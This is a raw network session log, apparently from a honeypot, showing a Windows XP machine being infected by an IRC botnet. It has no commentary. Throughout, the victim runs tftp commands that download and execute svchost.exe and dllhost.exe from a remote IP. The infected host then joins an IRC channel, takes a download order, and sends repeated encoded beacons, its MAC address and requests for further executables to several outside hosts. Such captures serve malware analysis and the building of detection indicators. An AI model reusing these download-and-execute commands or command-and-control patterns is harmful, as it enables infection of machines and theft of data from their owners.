VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp. C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\wins File Not Found C:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcache File Not Found C:\\WINDOWS\\system32>
VICTIM: tftp -i 175.124.143.165 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: Transfer successful: 64272 bytes in 27 seconds, 2380 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 175.124.143.165 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: Transfer successful: 19968 bytes in 9 seconds, 2218 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK ystoutqy USER j020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG ystoutqy :!get http:/yigeshabi.8800.org:2012/kp.exe
VICTIM: GET /kp.exe HTTP/1.0 User-Agent: Download Host: yigeshabi.8800.org:2012 Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2469F7DCEACA9F5FE9F6DDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=3.406924E-02 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /myck.jpg?t=0.5312616 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: russia.9966.org:2011 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=B7A9DF3BB020D3775EB3D0E16E2B22D10F94224786A2EF23AACC87C2F55D0F53423B16F17E400A26CFF23953FDED1EF423E9C62FF75587A220156CC475D9FE90275851F81316801FD3E9F98354BA508FE81F6A5738463F3986248EE311E42B50A3F6D8C692B8C659B7042AAD29299802B94EF7D88EC947604B12A4CB9C2A17A9313535916151AD6F083A257D71B7189B&t=0.1104853 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=9B85638757C705A10BE6B584B6F32BD8148F711444607BB77117ADE8CC64673B601908EF88B6103C0E33462C372709E3509A3AD370D25E7B93A6E941369AD5BB1669EC45CCC973EC566C166CCB25429DCA3D576A710F5254D173E08D3CC9FE85E9BC8896B89270EF21926FF9956C67EFD124E1BFFCAF380A889C7D08238113E94656963C2013884FECD9D989FA324AC8F012&t=0.1309931 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /ck3.jpg?t=0.5351068 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: russia.9966.org:2011 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=F6E8618520B08F1031DDAE827E35E8570D93A69F34112FB83F0D387D45EBE9B38BF22A302C6C3404E482B1DC211BFC11D5193F8999F6725A1F2B9CE40C8CBAD1A3DC3844FA35E47B83B9BFC530DE1EC18572EFD24739282EB81AA6CB6F9A0873590C405E6A40FE61F7441F98DBDBBA20D6218BA4C186CDEA91C8BDD23F895EE00401369C9EAC1EDB6953550294507D01&t=0.1201898 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=FEE0D632D949DD429C702C0083C81DA261FF8DB493B68F186456C08587294B11A7DED0CA0E4ED2E2F99F5F32102A00ED1AD63D8BEE813C14211539410B8BF2991B6438448B4443DCF5CF84FE5BB5FB249B6C665B710FC3C562C0F69B55A097ECA3F6322CE0CA7BE4A91A4ED843BA6AE2CE3B4B154C1F90A2E0F4CBBEE547B842CADA2482DDEB08CF7042B3E3EC2CEC92DA06&t=0.5199091 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck3.nucleardiscover.com:88
ATTACKER: GET /ck4.jpg?t=0.6370203 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: russia.9966.org:2011 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck3.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck3.nucleardiscover.com:88
ATTACKER: GET /sn.php?c=859BA84C9909AD0EEE02250F3F49A260925FE88C27779409016714567AD0560CCA85CBDC6323B89390AAF09EC3C865726199328925490C5F4475463FF474BED2116F73D7EBEF970886BC542ECE20A17E9661DAE75826F5F304A690FD7481245F3164233DAF85D54A328121A6EEEEAF3526D1012E5C1B795EC79E640BA7117FC13E3A9A366C5F38FE3C0A6838EF2D27A4&t=0.6687738 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=445ADF3B3AAA17B4628ECDE7DBAD31F35D90432782D263FE92F47C3E8D2762387837647347071B30D4EEFD93BDB63D2A2CD401BACDA1F7A47D4CC8B17FFF036F304E6DC9989CE37C4B712C566D836BB4E5120F32F6887F79DC7ECAA723D61E65CA9FE3FD73599F0034871680C23B3BB305F0F7A96231CCFE3B2FD9AC6ECCD42EE1F1EF495B69C1043D08B1E6D01570F04AA9&t=3.795803E-03 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck4.nucleardiscover.com:88
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: myck.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: ck4.nucleardiscover.com:88
ATTACKER: GET /p6.asp?MAC=00-0C-29-B8-6D-A5&Publicer=100 HTTP/1.0 User-Agent: CA 0.0.0.2 Host: myck.nucleardiscover.com:88
ATTACKER: GET /hn.gif?t=0.7525293 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: hn.yigeyuming.com:82 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=A3BD08ECAA3AC3123229A588377C348AD518197F0A5B6BF55D6F3B4CB01593BDD5AC40AA9DA6210F7144DB41C0CA1502C13BA91559287C2C2A4ACDB40F733AA697DAD7713DEB06996C56EB918E60B669BB4C1F22C9B7BDBBBB192449EE1BF2897623293781AB920DC172FC7B262689137186735C6E29EDCACC950A65F147CC723E3ACD679DAC27E34D78792C4D8A3EBF&t=0.785 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=948ADC38DA4A5283C2D9597490DBE85616DB5D3BC594C55B5260700774D1426C7B0256BCDDE6F1DFE9DCD943363C84939A60C8749EEFEBBBCBAB4039522EBD21CA872A8C23F5D946063C057F28C64D92689FE6DBB0CE7771E644BDD07A8F69125500D9C72903920D7ECDAF39F20B9B137580D78998CB90A2263257229A3840BA31212481AA9BE623F8CBE6B662A5098AF528&t=9.444827E-02 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /gggg.exe?t=0.7264063 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: 61.147.123.53:1056 Connection: Keep-Alive Pragma: no-cache
ATTACKER: GET /sn.php?c=FAE49F7BE575A67418E84F62F5B34FBFCE595E677D33E176E2D00347208A7D21C18A9089402C0D267D165C33212DD7CD12D400B74C3D5271EDC2C6BB324D3957AFE35E2A12C3DF402E14D3A91DF3C21DBC4BBE83D7A96264AC0EB9D4C035542F13461709341E920DCC7FD2559090158FBF48C5EA96D1A681623B1C7313A5F14F7F7A08ADBE8EDB1B3801B7E064A4156B&t=0.3929712 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600) Host: w.nucleardiscover.com:888 Connection: Keep-Alive Pragma: no-cache